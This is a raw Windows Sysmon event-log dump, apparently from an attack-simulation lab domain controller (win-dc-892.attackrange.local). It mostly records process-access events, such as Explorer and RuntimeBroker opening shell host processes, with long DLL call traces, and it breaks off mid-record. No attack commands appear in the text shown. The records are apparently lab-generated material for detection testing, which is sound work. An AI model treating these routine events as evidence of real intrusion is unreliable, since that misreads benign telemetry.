12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.695{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:
\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF4DE3872158647D89FC1269C753F9CD,SHA256=4F0B431B36A8A711C8AB73ACDE9BBC48F9FF9D8CE35088A6D532C765B0EC5E6B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\W
indows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.679{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.d
ll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.S